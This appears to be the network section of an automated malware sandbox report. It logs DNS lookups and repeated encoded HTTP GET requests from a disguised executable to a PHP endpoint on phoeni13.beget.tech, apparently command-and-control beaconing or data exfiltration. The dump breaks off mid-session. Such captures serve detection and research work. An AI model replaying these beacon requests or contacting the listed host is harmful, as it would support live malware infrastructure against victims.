Jan 5, 2025 19:00:59.801615953 CET	50049	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:59.801615953 CET	50048	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:59.806762934 CET	80	50049	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:59.806778908 CET	80	50048	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:59.806865931 CET	50049	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:59.806874037 CET	50048	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:59.807121038 CET	50049	80	192.168.2.4	5.101.152.15
Jan 5, 2025 19:00:59.812197924 CET	80	50049	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:59.812208891 CET	80	50049	5.101.152.15	192.168.2.4
Jan 5, 2025 19:00:59.812217951 CET	80	50049	5.101.152.15	192.168.2.4
Jan 5, 2025 19:01:00.966114044 CET	80	50049	5.101.152.15	192.168.2.4
Jan 5, 2025 19:01:01.128729105 CET	50049	80	192.168.2.4	5.101.152.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 18:57:04.919401884 CET	53608	53	192.168.2.4	1.1.1.1
Jan 5, 2025 18:57:04.976646900 CET	53	53608	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 5, 2025 18:57:04.919401884 CET	192.168.2.4	1.1.1.1	0x497	Standard query (0)	phoeni13.beget.tech	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 5, 2025 18:57:04.976646900 CET	1.1.1.1	192.168.2.4	0x497	No error (0)	phoeni13.beget.tech		5.101.152.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

phoeni13.beget.tech

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:04.988123894 CET	639	OUT	GET /19bd75f9.php?b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8&152f328392d8768f56766d0288112f44=f6a1095ee603dfb2a6045076d6e72102&365174fb29f58fe307a28d17c1f20f9c=QYkJ2NxQjZjdjM3EzM2gzNiNDOxQzYlFTNzkDOmF2MhlTZ3ETMmZjY&b6HJXtf=X3QUfa7Lxah4DWkcnRkhelidjFg&nO2C=tNXjw4Eymxo9xHEWogFJ&XwVwva42ijhfRTJM20Xfs1x4ev7bs9r=2oWbCxBeJ6ENGdfy5KvqsnPf8 HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:05.857100010 CET	1236	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2160 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 69 45 7a 59 6b 4a 44 4f 33 45 7a 4e 6d 46 47 4e 31 51 6d 5a 30 49 44 4f 31 67 7a 4d 34 49 57 4e 6c 6c 7a 59 7a 4d 7a 4d 34 59 32 4d 69 6f 6a 49 69 5a 47 4d 30 4d 6a 4e 78 67 44 5a 77 41 44 4e 68 52 44 4d 68 5a 6a 5a 33 49 6d 5a 68 68 54 4e 6b 5a 6a 4e 6d 5a 54 5a 68 52 6a 49 73 49 69 5a 52 39 32 64 50 6c 6d 53 35 70 46 57 53 6c 6e 57 59 70 56 64 69 42 6a 54 31 6b 6c 4d 31 77 32 59 75 70 55 4d 5a 46 54 4f 31 46 32 56 6b 46 6a 59 49 4a 6b 64 61 64 31 59 70 6c 30 51 42 74 45 54 44 6c 30 61 4a 70 32 62 70 39 55 52 61 56 6c 56 57 6c 7a 63 69 4a 6a 53 30 56 6d 56 4f 56 54 57 79 55 44 62 6a 35 6d 53 78 6b 56 4d 35 55 58 59 58 52 57 4d 69 68 6b 51 32 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 72 6c 6b 61 76 6c 6d 59 48 6c 54 61 69 68 46 62 55 56 32 56 4f 56 6e 57 59 70 55 65 6b 64 6c 54 6d 4a 57 62 73 35 47 5a 58 68 33 64 69 4a 6a 56 75 6c 55 61 42 64 32 51 70 64 58 61 53 5a 6b 54 57 6c 6b 61 76 6c 6d 57 58 4a 6c 64 52 4e 44 62 71 4a 57 62 57 6c 33 59 75 5a 6c 61 59 4a 54 4e 77 70 31 4d 57 4e [TRUNCATED] Data Ascii: ==QfiEzYkJDO3EzNmFGN1QmZ0IDO1gzM4IWNllzYzMzM4Y2MiojIiZGM0MjNxgDZwADNhRDMhZjZ3ImZhhTNkZjNmZTZhRjIsIiZR92dPlmS5pFWSlnWYpVdiBjT1klM1w2YupUMZFTO1F2VkFjYIJkdad1Ypl0QBtETDl0aJp2bp9URaVlVWlzciJjS0VmVOVTWyUDbj5mSxkVM5UXYXRWMihkQ2p1VjlWSDF0SMNUSrlkavlmYHlTaihFbUV2VOVnWYpUekdlTmJWbs5GZXh3diJjVulUaBd2QpdXaSZkTWlkavlmWXJldRNDbqJWbWl3YuZlaYJTNwp1MWN3YHlDbalXSnlUQvNXStRXeiFDbmRmMW9ETxgHaZJDb5p1VxIUSq9WaadVN2VWbWRXYYJlZi1GbuR2V4dnYyYlbJlWQnNUa3lWTElUaPlmS6R2VstWWWpUNZJjR5R2VOpWUXVjdhhlUollM5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkanJTTEFUdOR0Y0lkavlmWXJVMkdEbuJWb5MHWyUDcaNjVzN2R5wmW5l0ZJF0bzlkaNlXTUNWdNRUUp9UaKxmWIZFMhhlUoJmR5UXYXRWMihkQ2p1VjlWSDF0SMNkSollMslnWXFjQJdEawMWb58USq9WaadVMoRlbSVnWXVDckdUN2lVM5UXYXRWMihkQ2p1VjlWSDF0SMNkSCRVaJZTStZ1aiBjTwIWbWVXYYJVdiJjTmJWbs5GZXh3diJjVulUaBd2QphHbjJDeoplavlmWYJFajxmUCZlbWxGWyUDcaNjVzN2R5wmW5l0ZJF0bz1ERvlmVVZVdhZVO1F2VkFjYIJkdad1Ypl0QBtETDpkeahlUoRmRNdmWHZFMhdVNWlkavlmWXFDaU5Gb5R2R1EjYy4kZi1GbuR2V4dnYyYlbJlWQnNUa3lWVxUVaPlmSsp1R5QUZYpEMi5mV2lVM5UXYXRWMihkQ2
Jan 5, 2025 18:57:05.857121944 CET	1171	IN	Data Raw: 70 31 56 6a 6c 57 53 44 46 30 53 4d 4e 55 53 34 31 45 52 56 6c 32 54 70 70 45 62 61 64 55 4f 45 6c 31 56 78 73 47 57 79 55 44 63 61 4e 6a 56 7a 4e 32 52 35 77 6d 57 35 6c 30 5a 4a 46 30 62 7a 6c 55 61 4a 5a 54 53 74 5a 31 61 69 42 6a 54 6f 70 46 Data Ascii: p1VjlWSDF0SMNUS41ERVl2TppEbadUOEl1VxsGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUaJZTStZ1aiBjTopFWKhGWyUDcaNjVzN2R5wmW5l0ZJF0bzlUb0lnYxs2ZkJjVPlkavlmWXFDaU1WN2F2Vkx2YslTdhdFZxIGSCZnWXNWaJNUQLx0QKpFVplkNJ1mVrJGMOVnYywmbahlSmJWbs5GZXh3diJjVulUaBd2QpdXahNjS2d1U
Jan 5, 2025 18:57:05.987227917 CET	781	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZTZ0czY0EWYyUDNxM2YiVGZwIWMxkDN0QGO5IGOkdjYjBjNmFGZmJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:06.208755016 CET	832	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&2cab15acb9861112e256b821d78413ec=0VfiIiOiczYyYzNkdTM1E2N2MjNlJWYyQzMiFWYzgzN2UTYkVGMiwiIjFTZ1QzYkFDO5QmMyMDOzYWOiN2NhJWY1cjZxYzMjFTMxI2N5MmMkJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W HTTP/1.1 Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:06.220690966 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4d 6b 5a 6d 5a 34 4d 44 5a 32 4d 57 4e 78 6b 6a 4e 6a 4e 7a 59 6b 68 44 5a 6a 5a 47 4f 34 4d 44 4f 32 45 6d 4e 33 55 44 4f 30 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6IiMkZmZ4MDZ2MWNxkjNjNzYkhDZjZGO4MDO2EmN3UDO0Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye
Jan 5, 2025 18:57:06.447065115 CET	221	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/8.2.22
Jan 5, 2025 18:57:06.450741053 CET	2896	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&e2d3fb800645a2797de70f7dc33b39b6=0VfikjSpFFSxkmYshnRYlnVtNmd4d0Y0Y1RJBjVtJWeWdEZ1x2RYNGbp5ENnh0Sn1EWaNHbtJ1ZwcVW5RmMilnQGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETpRjMkZXNyEWdWxWS2kUajxmTYZFdGdlWw4EbJNXSpJ2M50mYyVzVWl2bqlkb1cVWNFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQWJGaWdEZUp0QMlWRt5UaGdFT3dmaOJTWE50dJJTZ1BDSNdXQE10dBRUT3RzUNVXQqx0dz5WS2kUejxWNyI2bCNjY550Vh5kSDxUaJl2Tp1EWihmTtlFbkxWSzlUaiNmSIhFerZVUNJUMVpkUFh1Y1MEWjhnRYl2bqlke1clWsp0MZRlSDxUa0IDZ2VjMhVnVslkNJNUVKVTVR1kSDxUaJBjUnFlaJZTSTRlQKxWSzlUaiNTOtJmc1clVp9maJNHeXl1MW12Ywp1aJNXSpNGbS1mYsp1VaVkQ5N2M5ckW1xmM [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:06.684520960 CET	221	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Keep-Alive: timeout=30 X-Powered-By: PHP/8.2.22

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:06.170741081 CET	2437	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=QX9JiI6IyNjJjN3Q2NxUTY3YzM2UmYhJDNzIWYhNDO3YTNhRWZwICLiUmZxMmN4EjMkRGM3EmZwEzYwITY1UjNjNDMkBDZwUWMmlzNiJ2YiVmI6IiMmhDZ2gTN0AjYzYmNyQGO0YTZlFmY2UTN4ETYmNTZ4ICLiEmYlJ2YkZWMyEDM0U2YmhDO3gTYllTO1MzYmhjN1ATOyMTY1kDOjBjI6ICM2IjM2cTY1MWO1IjZ3ADO2U2N4IjZxkDM3YmN2Y2NjJyes0nIwglZpFkaJZTSplFMZpXWzUUbZxmVHp1dRdlWtZ0VNpGaE5kMZ1mT0UUbZhmSq10aspWT5l0VONTRH9EeV1WWpNnbPlWRHRGaSVEZ0YVbJNXVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMlWVtRGcSNT [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:06.936717033 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:11.952850103 CET	2879	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWWE5kNrRkT2cGRNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech
Jan 5, 2025 18:57:13.245193005 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:18.276588917 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWml2Y61kNFRUT2cGVNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:19.039251089 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 5, 2025 18:57:24.057284117 CET	2903	OUT	GET /19bd75f9.php?Dqk1RxxsMic=WB03Lj3Jl0wyHeC69XJobc5AEC9&1AEXzLSWm6uLx=rM4vu&u0tyZxa3GzzJjfRlwY95MqTCn=1TusFTSMmAQQ7BuYQwHklR0GafwylEg&3f032fcade01e4b9f042d13e86634631=QZzQWYzYWZiBTYyImN4ADMlZmNzgjZ2ITNwQDO0MWN4YzMmZ2YwkjN3ETOwQDM4YTM0gDN2YDN&365174fb29f58fe307a28d17c1f20f9c=gYhlTOiNDZiVzMjRzNxUWYiZDM2YjN1YWMmZGZ2QWO2UmMmRGO5M2M&4bb748b03ddc22e891199067c0479300=d1nIlZWMjZDOxIDZkBzNhZGMxMGMyEWN1YzYzADZwQGMlFjZ5cjYiNmYlJiOiIjZ4QmN4UDNwI2MmZjMkhDN2UWZhJmN1UDOxEmZzUGOiwiIhJWZiNGZmFjMxADNlNmZ4gzN4EWZ5kTNzMmZ4YTNwkjMzEWN5gzYwIiOiAjNyIjN3EWNjlTNyY2NwgjNldDOyYWM5AzNmZjNmdzYis3W&2cab15acb9861112e256b821d78413ec=d1nIiojI3MmM2cDZ3ETNhdjNzYTZiFmM0MjYhF2M4cjN1EGZlBjIsISZmFzY2gTMyQGZwcTYmBTMjBjMhVTN2M2MwQGMkBTZxYWO3ImYjJWZiojIyYGOkZDO1QDMiNjZ2IDZ4QjNlVWYiZTN1gTMhZ2MlhjIsISYiVmYjRmZxITMwQTZjZGO4cDOhVWO5UzMjZGO2UDM5IzMhVTO4MGMiojIwYjMyYzNhVzY5UjMmdDM4YTZ3gjMmFTOwcjZ2YjZ3MmI7xSfiADWmlWVU1kNjpWT20ERNl2bqlUbapnTzEFRPxmRU50MVpXTy0kMNVTVUpVaS1WW4FlaORTUy4ENFJjTrZUbZhmSXlFbadkW6l0QMlWVD1keJl2TptGRNhXWU9UaKRVTrZUbONzYq1EerRkT4FFRO [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: phoeni13.beget.tech Connection: Keep-Alive
Jan 5, 2025 18:57:24.794070959 CET	350	IN	HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Sun, 05 Jan 2025 17:57:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Keep-Alive: timeout=30 Vary: Accept-Encoding X-Powered-By: PHP/8.2.22 Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4e 6b 6c 44 4d 7a 49 6d 4d 79 51 7a 4d 32 49 6d 5a 33 59 54 5a 34 55 47 4d 32 59 44 4e 33 55 54 4f 6d 5a 44 4e 34 55 44 4d 32 49 79 65 36 49 69 59 32 59 32 59 33 55 32 4e 6c 4a 32 59 30 49 47 4f 30 51 6d 5a 34 51 6a 4d 6c 42 44 4f 32 55 47 4e 33 59 44 4f 79 51 6a 4e 69 4a 79 65 Data Ascii: ==Qf9JiI6ICNklDMzImMyQzM2ImZ3YTZ4UGM2YDN3UTOmZDN4UDM2Iye6IiY2Y2Y3U2NlJ2Y0IGO0QmZ4QjMlBDO2UGN3YDOyQjNiJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	5.101.152.15	80	7744	C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Timestamp	Bytes transferred	Direction	Data
